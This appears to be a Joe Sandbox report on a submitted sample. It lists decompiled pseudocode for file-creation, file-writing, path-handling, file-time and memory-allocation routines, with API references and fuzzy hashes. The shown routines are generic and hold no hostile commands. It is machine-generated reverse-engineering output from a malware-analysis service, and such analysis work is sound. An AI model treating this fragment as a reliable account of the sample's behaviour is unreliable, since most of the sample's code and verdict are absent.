                                                                                                                                                                                                                                            0x008d4c40
                                                                                                                                                                                                                                            0x008d4c4a
                                                                                                                                                                                                                                            0x008d4c8d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d4c70
                                                                                                                                                                                                                                            0x008d4c70
                                                                                                                                                                                                                                            0x008d4c7e
                                                                                                                                                                                                                                            0x008d4c86
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d4c8a

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • DosDateTimeToFileTime.KERNEL32 ref: 008D4C54
                                                                                                                                                                                                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 008D4C66
                                                                                                                                                                                                                                            • SetFileTime.KERNELBASE(?,?,?,?), ref: 008D4C7E
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Time$File$DateLocal
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2071732420-0
                                                                                                                                                                                                                                            • Opcode ID: 8732b2a278f6a599cedd08a5bb02498fa01feeb7d66c20846006766903fcba44
                                                                                                                                                                                                                                            • Instruction ID: b92c4cd3f2cb93ecb181f5550861241ee9b1395fdc3772903f508406a3d5a5dd
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8732b2a278f6a599cedd08a5bb02498fa01feeb7d66c20846006766903fcba44
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 75F0907261220DAF9F24DFB4CC49DBB77ADFB04250B44072BA816C2190FA34D914C7A0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 75%
                                                                                                                                                                                                                                            			E008D487A(CHAR* __ecx, signed int __edx) {
                                                                                                                                                                                                                                            				void* _t7;
                                                                                                                                                                                                                                            				CHAR* _t11;
                                                                                                                                                                                                                                            				long _t18;
                                                                                                                                                                                                                                            				long _t23;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t11 = __ecx;
                                                                                                                                                                                                                                            				asm("sbb edi, edi");
                                                                                                                                                                                                                                            				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
                                                                                                                                                                                                                                            				if((__edx & 0x00000100) == 0) {
                                                                                                                                                                                                                                            					asm("sbb esi, esi");
                                                                                                                                                                                                                                            					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					if((__edx & 0x00000400) == 0) {
                                                                                                                                                                                                                                            						asm("sbb esi, esi");
                                                                                                                                                                                                                                            						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t23 = 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
                                                                                                                                                                                                                                            				if(_t7 != 0xffffffff || _t23 == 3) {
                                                                                                                                                                                                                                            					return _t7;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					E008D490C(_t11);
                                                                                                                                                                                                                                            					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}







                                                                                                                                                                                                                                            0x008d4880
                                                                                                                                                                                                                                            0x008d488c
                                                                                                                                                                                                                                            0x008d4894
                                                                                                                                                                                                                                            0x008d48a0
                                                                                                                                                                                                                                            0x008d48c9
                                                                                                                                                                                                                                            0x008d48ce
                                                                                                                                                                                                                                            0x008d48a2
                                                                                                                                                                                                                                            0x008d48a8
                                                                                                                                                                                                                                            0x008d48b7
                                                                                                                                                                                                                                            0x008d48bc
                                                                                                                                                                                                                                            0x008d48aa
                                                                                                                                                                                                                                            0x008d48ac
                                                                                                                                                                                                                                            0x008d48ac
                                                                                                                                                                                                                                            0x008d48a8
                                                                                                                                                                                                                                            0x008d48de
                                                                                                                                                                                                                                            0x008d48e7
                                                                                                                                                                                                                                            0x008d490b
                                                                                                                                                                                                                                            0x008d48ee
                                                                                                                                                                                                                                            0x008d48f0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d4902

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,008D4A23,?,008D4F67,*MEMCAB,00008000,00000180), ref: 008D48DE
                                                                                                                                                                                                                                            • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,008D4F67,*MEMCAB,00008000,00000180), ref: 008D4902
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                                                                                                            • Opcode ID: d1f1d9ec7056805abc54dcde3a5b05086011a90bcacae83546a2b88193ccee0e
                                                                                                                                                                                                                                            • Instruction ID: f5bd51b0feba87a50f6cb53b8c0d719664b811e4f7f834ce330e12d46cddda80
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d1f1d9ec7056805abc54dcde3a5b05086011a90bcacae83546a2b88193ccee0e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AF014BA3E125742BF32440298C88FB7571CEB96775F2B1336BDEAE72D2D6644C0491E0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                                            			E008D4AD0(signed int _a4, void* _a8, long _a12) {
                                                                                                                                                                                                                                            				signed int _t9;
                                                                                                                                                                                                                                            				int _t12;
                                                                                                                                                                                                                                            				signed int _t14;
                                                                                                                                                                                                                                            				signed int _t15;
                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                            				struct HWND__* _t21;
                                                                                                                                                                                                                                            				signed int _t24;
                                                                                                                                                                                                                                            				signed int _t25;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t20 =  *0x8d858c; // 0x270
                                                                                                                                                                                                                                            				_t9 = E008D3680(_t20);
                                                                                                                                                                                                                                            				if( *0x8d91d8 == 0) {
                                                                                                                                                                                                                                            					_push(_t24);
                                                                                                                                                                                                                                            					_t12 = WriteFile( *(0x8d8d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
                                                                                                                                                                                                                                            					if(_t12 != 0) {
                                                                                                                                                                                                                                            						_t25 = _a12;
                                                                                                                                                                                                                                            						if(_t25 != 0xffffffff) {
                                                                                                                                                                                                                                            							_t14 =  *0x8d9400; // 0xd0200
                                                                                                                                                                                                                                            							_t15 = _t14 + _t25;
                                                                                                                                                                                                                                            							 *0x8d9400 = _t15;
                                                                                                                                                                                                                                            							if( *0x8d8184 != 0) {
                                                                                                                                                                                                                                            								_t21 =  *0x8d8584; // 0x0
                                                                                                                                                                                                                                            								if(_t21 != 0) {
                                                                                                                                                                                                                                            									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0x8d93f8, 0);
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t25 = _t24 | 0xffffffff;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					return _t25;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					return _t9 | 0xffffffff;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}











                                                                                                                                                                                                                                            0x008d4ad5
                                                                                                                                                                                                                                            0x008d4adb
                                                                                                                                                                                                                                            0x008d4ae7
                                                                                                                                                                                                                                            0x008d4aee
                                                                                                                                                                                                                                            0x008d4b05
                                                                                                                                                                                                                                            0x008d4b0d
                                                                                                                                                                                                                                            0x008d4b14
                                                                                                                                                                                                                                            0x008d4b1a
                                                                                                                                                                                                                                            0x008d4b1c
                                                                                                                                                                                                                                            0x008d4b21
                                                                                                                                                                                                                                            0x008d4b2a
                                                                                                                                                                                                                                            0x008d4b2f
                                                                                                                                                                                                                                            0x008d4b31
                                                                                                                                                                                                                                            0x008d4b39
                                                                                                                                                                                                                                            0x008d4b54
                                                                                                                                                                                                                                            0x008d4b54
                                                                                                                                                                                                                                            0x008d4b39
                                                                                                                                                                                                                                            0x008d4b2f
                                                                                                                                                                                                                                            0x008d4b0f
                                                                                                                                                                                                                                            0x008d4b0f
                                                                                                                                                                                                                                            0x008d4b0f
                                                                                                                                                                                                                                            0x008d4b5e
                                                                                                                                                                                                                                            0x008d4ae9
                                                                                                                                                                                                                                            0x008d4aed
                                                                                                                                                                                                                                            0x008d4aed

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 008D3680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 008D369F
                                                                                                                                                                                                                                              • Part of subcall function 008D3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 008D36B2
                                                                                                                                                                                                                                              • Part of subcall function 008D3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 008D36DA
                                                                                                                                                                                                                                            • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 008D4B05
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1084409-0
                                                                                                                                                                                                                                            • Opcode ID: 4bbe02f0e496915be42dfeeb9a5814406886bbf427458d0fc424bde66a8e4210
                                                                                                                                                                                                                                            • Instruction ID: 4574dfa965ebd958a9609ad4138b8812263f8e37b8bdcb3aa86149601b8412bd
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4bbe02f0e496915be42dfeeb9a5814406886bbf427458d0fc424bde66a8e4210
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2F016931201205ABDB148FA8EC05FA67769FB58735F149327E939D72E0CB70D811CB80
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E008D658A(char* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                                                            				intOrPtr _t4;
                                                                                                                                                                                                                                            				char* _t6;
                                                                                                                                                                                                                                            				char* _t8;
                                                                                                                                                                                                                                            				void* _t10;
                                                                                                                                                                                                                                            				void* _t12;
                                                                                                                                                                                                                                            				char* _t16;
                                                                                                                                                                                                                                            				intOrPtr* _t17;
                                                                                                                                                                                                                                            				void* _t18;
                                                                                                                                                                                                                                            				char* _t19;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t16 = __ecx;
                                                                                                                                                                                                                                            				_t10 = __edx;
                                                                                                                                                                                                                                            				_t17 = __ecx;
                                                                                                                                                                                                                                            				_t1 = _t17 + 1; // 0x8d8b3f
                                                                                                                                                                                                                                            				_t12 = _t1;
                                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                                            					_t4 =  *_t17;
                                                                                                                                                                                                                                            					_t17 = _t17 + 1;
                                                                                                                                                                                                                                            				} while (_t4 != 0);
                                                                                                                                                                                                                                            				_t18 = _t17 - _t12;
                                                                                                                                                                                                                                            				_t2 = _t18 + 1; // 0x8d8b40
                                                                                                                                                                                                                                            				if(_t2 < __edx) {
                                                                                                                                                                                                                                            					_t19 = _t18 + __ecx;
                                                                                                                                                                                                                                            					if(_t19 > __ecx) {
                                                                                                                                                                                                                                            						_t8 = CharPrevA(__ecx, _t19); // executed
                                                                                                                                                                                                                                            						if( *_t8 != 0x5c) {
                                                                                                                                                                                                                                            							 *_t19 = 0x5c;
                                                                                                                                                                                                                                            							_t19 =  &(_t19[1]);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t6 = _a4;
                                                                                                                                                                                                                                            					 *_t19 = 0;
                                                                                                                                                                                                                                            					while( *_t6 == 0x20) {
                                                                                                                                                                                                                                            						_t6 = _t6 + 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					return E008D16B3(_t16, _t10, _t6);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return 0x8007007a;
                                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                                            0x008d6592
                                                                                                                                                                                                                                            0x008d6594
                                                                                                                                                                                                                                            0x008d6596
                                                                                                                                                                                                                                            0x008d6598
                                                                                                                                                                                                                                            0x008d6598
                                                                                                                                                                                                                                            0x008d659b
                                                                                                                                                                                                                                            0x008d659b
                                                                                                                                                                                                                                            0x008d659d
                                                                                                                                                                                                                                            0x008d659e
                                                                                                                                                                                                                                            0x008d65a2
                                                                                                                                                                                                                                            0x008d65a4
                                                                                                                                                                                                                                            0x008d65a9
                                                                                                                                                                                                                                            0x008d65b2
                                                                                                                                                                                                                                            0x008d65b6
                                                                                                                                                                                                                                            0x008d65ba
                                                                                                                                                                                                                                            0x008d65c3
                                                                                                                                                                                                                                            0x008d65c5
                                                                                                                                                                                                                                            0x008d65c8
                                                                                                                                                                                                                                            0x008d65c8
                                                                                                                                                                                                                                            0x008d65c3
                                                                                                                                                                                                                                            0x008d65c9
                                                                                                                                                                                                                                            0x008d65cc
                                                                                                                                                                                                                                            0x008d65d2
                                                                                                                                                                                                                                            0x008d65d1
                                                                                                                                                                                                                                            0x008d65d1
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d65dc
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CharPrevA.USER32(008D8B3E,008D8B3F,00000001,008D8B3E,-00000003,?,008D60EC,008D1140,?), ref: 008D65BA
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CharPrev
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 122130370-0
                                                                                                                                                                                                                                            • Opcode ID: 4c1e3d7768bdc9f4839f06dd19e236eaa01445ccd5cb89ae70ba75ae71e3aba4
                                                                                                                                                                                                                                            • Instruction ID: 90369f60d1fcf4f2f559558c17189b2bd10089406c732f5dfb97926dc68c6f5b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4c1e3d7768bdc9f4839f06dd19e236eaa01445ccd5cb89ae70ba75ae71e3aba4
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ABF0A2321042589BD731490DB884B76BFEDFB96310F28035FE8DAC3309EA558C9183A0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                                            			E008D621E() {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				signed int _t5;
                                                                                                                                                                                                                                            				void* _t9;
                                                                                                                                                                                                                                            				void* _t13;
                                                                                                                                                                                                                                            				void* _t19;
                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                            				signed int _t21;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t5 =  *0x8d8004; // 0x12cb0cef
                                                                                                                                                                                                                                            				_v8 = _t5 ^ _t21;
                                                                                                                                                                                                                                            				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                            					0x4f0 = 2;
                                                                                                                                                                                                                                            					_t9 = E008D597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					E008D44B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                                                            					 *0x8d9124 = E008D6285();
                                                                                                                                                                                                                                            					_t9 = 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E008D6CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
                                                                                                                                                                                                                                            			}











                                                                                                                                                                                                                                            0x008d6229
                                                                                                                                                                                                                                            0x008d6230
                                                                                                                                                                                                                                            0x008d6247
                                                                                                                                                                                                                                            0x008d626a
                                                                                                                                                                                                                                            0x008d6272
                                                                                                                                                                                                                                            0x008d6249
                                                                                                                                                                                                                                            0x008d6255
                                                                                                                                                                                                                                            0x008d625f
                                                                                                                                                                                                                                            0x008d6264
                                                                                                                                                                                                                                            0x008d6264
                                                                                                                                                                                                                                            0x008d6284

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 008D623F
                                                                                                                                                                                                                                              • Part of subcall function 008D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 008D4518
                                                                                                                                                                                                                                              • Part of subcall function 008D44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 008D4554
                                                                                                                                                                                                                                              • Part of subcall function 008D6285: GetLastError.KERNEL32(008D5BBC), ref: 008D6285
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 381621628-0
                                                                                                                                                                                                                                            • Opcode ID: 07a4c3d5631840f96d484bb3e5b9bce935f2d745205c48a2a49ac54fa1c37fc9
                                                                                                                                                                                                                                            • Instruction ID: 3ced9092d068ff8f2fd44ce6a88c24a17e2693af0bf0be2eae026def7e5a6d39
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 07a4c3d5631840f96d484bb3e5b9bce935f2d745205c48a2a49ac54fa1c37fc9
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 23F0E2B070020CABEB50EB78DD02FBE37ACFB44700F40026BB986D6282FD749D948651
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E008D4B60(signed int _a4) {
                                                                                                                                                                                                                                            				signed int _t9;
                                                                                                                                                                                                                                            				signed int _t15;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t15 = _a4 * 0x18;
                                                                                                                                                                                                                                            				if( *((intOrPtr*)(_t15 + 0x8d8d64)) != 1) {
                                                                                                                                                                                                                                            					_t9 = FindCloseChangeNotification( *(_t15 + 0x8d8d74)); // executed
                                                                                                                                                                                                                                            					if(_t9 == 0) {
                                                                                                                                                                                                                                            						return _t9 | 0xffffffff;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					 *((intOrPtr*)(_t15 + 0x8d8d60)) = 1;
                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t15 + 0x8d8d60)) = 1;
                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t15 + 0x8d8d68)) = 0;
                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t15 + 0x8d8d70)) = 0;
                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t15 + 0x8d8d6c)) = 0;
                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                            			}





                                                                                                                                                                                                                                            0x008d4b66
                                                                                                                                                                                                                                            0x008d4b74
                                                                                                                                                                                                                                            0x008d4b98
                                                                                                                                                                                                                                            0x008d4ba0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d4bac
                                                                                                                                                                                                                                            0x008d4ba4
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d4ba4
                                                                                                                                                                                                                                            0x008d4b78
                                                                                                                                                                                                                                            0x008d4b7e
                                                                                                                                                                                                                                            0x008d4b84
                                                                                                                                                                                                                                            0x008d4b8a
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,008D4FA1,00000000), ref: 008D4B98
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2591292051-0
                                                                                                                                                                                                                                            • Opcode ID: ee52e6eac98d5c842d55c27fe3cad1b83da38add268f1407d025d803f9b15b48
                                                                                                                                                                                                                                            • Instruction ID: 430f25c305370db259cd06ae1f5989e70001b2eff960a22b0efc627138568f51
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ee52e6eac98d5c842d55c27fe3cad1b83da38add268f1407d025d803f9b15b48
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9CF0FE31500B0CDF47619E7A8C02652BBE6FAA53707201B2BA46ED32D0DB70A841CB90
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E008D66AE(CHAR* __ecx) {
                                                                                                                                                                                                                                            				unsigned int _t1;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t1 = GetFileAttributesA(__ecx); // executed
                                                                                                                                                                                                                                            				if(_t1 != 0xffffffff) {
                                                                                                                                                                                                                                            					return  !(_t1 >> 4) & 0x00000001;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}




                                                                                                                                                                                                                                            0x008d66b1
                                                                                                                                                                                                                                            0x008d66ba
                                                                                                                                                                                                                                            0x008d66c7
                                                                                                                                                                                                                                            0x008d66bc
                                                                                                                                                                                                                                            0x008d66be
                                                                                                                                                                                                                                            0x008d66be

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNELBASE(?,008D4777,?,008D4E38,?), ref: 008D66B1
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                                                                                                                            • Opcode ID: e0841bb0ff67121c0b0086695e748346394d6e3f02ffcdaef583f7d849bdeda8
                                                                                                                                                                                                                                            • Instruction ID: c02efcde5687c1db9bb0a2d75746f3d6a5a94d5b2db53ff3ae61ccab630c7f37
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e0841bb0ff67121c0b0086695e748346394d6e3f02ffcdaef583f7d849bdeda8
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FCB09276222844826A240635BC295563A41F6E123A7E85B92F032C02E0DA3EC856D004
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E008D4CA0(long _a4) {
                                                                                                                                                                                                                                            				void* _t2;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t2 = GlobalAlloc(0, _a4); // executed
                                                                                                                                                                                                                                            				return _t2;
                                                                                                                                                                                                                                            			}




                                                                                                                                                                                                                                            0x008d4caa
                                                                                                                                                                                                                                            0x008d4cb1

                                                                                                                                                                                                                                            APIs
